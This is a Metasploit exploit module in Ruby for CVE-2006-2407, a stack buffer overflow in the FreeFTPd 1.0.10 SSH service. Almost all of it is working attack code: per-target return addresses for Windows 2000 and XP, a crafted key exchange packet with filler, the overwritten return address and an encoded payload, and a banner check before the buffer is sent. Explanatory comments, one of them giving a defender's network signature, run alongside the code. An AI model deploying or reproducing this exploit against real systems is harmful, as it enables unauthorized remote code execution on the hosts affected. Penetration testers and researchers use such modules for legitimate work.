##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit exploit module for CVE-2006-2407 (OSVDB 25569, BID 17958): a
# stack buffer overflow in FreeFTPd 1.0.10 triggered by an oversized key
# exchange algorithm string sent by an SSH client (see 'Description').
# Only the TCP mixin is used; no SSH protocol library is involved, so the
# whole client-side exchange is a single hand-built byte string.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # Registers module metadata and options.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow',
        'Description' => %q{
          This module exploits a simple stack buffer overflow in FreeFTPd 1.0.10
          This flaw is due to a buffer overflow error when handling a specially
          crafted key exchange algorithm string received from an SSH client.
          This module is based on MC's freesshd_key_exchange exploit.
        },
        'Author' => 'riaf <riaf[at]mysec.org>',
        'License' => BSD_LICENSE,
        'References' => [
          ['CVE', '2006-2407'],
          ['OSVDB', '25569'],
          ['BID', '17958'],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        # The payload must fit in 500 bytes and may not contain NUL, since the
        # buffer is carried inside a string the server parses.
        'Payload' => {
          'Space' => 500,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        # Each target differs only in the hard-coded return address, so a
        # wrong OS/language selection means the overwrite lands elsewhere.
        'Targets' => [
          [ 'Windows 2000 SP0-SP4 English', { 'Ret' => 0x750231e2 } ],
          [ 'Windows 2000 SP0-SP4 German', { 'Ret' => 0x74f931e2 } ],
          [ 'Windows XP SP0-SP1 English', { 'Ret' => 0x71ab1d54 } ],
          [ 'Windows XP SP2 English', { 'Ret' => 0x71ab9372 } ],
        ],
        'Privileged' => true,
        'DisclosureDate' => '2006-05-12',
        'DefaultTarget' => 0,
        # Reliability, stability and side effects have not been assessed for
        # this module; the framework constants record that explicitly.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # Only the port is configurable; 22 is the SSH default.
    register_options(
      [
        Opt::RPORT(22)
      ]
    )
  end

  # Connects to the target, checks the server banner, and sends the
  # overflow buffer only when the banner matches the vulnerable build.
  # The handler and disconnect run on both paths.
  def exploit
    connect

    # Client identification string, terminated by the "\x0a" that starts the
    # next line; the remaining fixed bytes precede the oversized key exchange
    # algorithm string named in 'Description' (exact packet layout is not
    # documented here — treat as opaque).
    sploit = "SSH-2.0-OpenSSH_3.9p1"
    sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
    sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
    # 1055 filler bytes up to the saved return address, written little-endian.
    sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V')
    # Payload followed by 19000 bytes of alphanumeric padding. For defenders:
    # a first client packet carrying ~20 KB of alphanumeric data after the
    # version string is a straightforward network signature for this exploit.
    sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n"

    # Only the first 40 bytes of the server greeting are read; the regex is
    # unanchored, so it matches anywhere within that window. A server whose
    # banner differs (including a patched build with another version string)
    # receives nothing.
    res = sock.recv(40)
    if (res =~ /SSH-2\.0-WeOnlyDo-wodFTPD 2\.1\.8\.98/)
      print_status("Trying target #{target.name}...")
      sock.put(sploit)
    else
      print_status("Not running a vulnerable version...")
    end

    # NOTE: handler is invoked even when the banner check failed and no
    # buffer was sent.
    handler
    disconnect
  end
end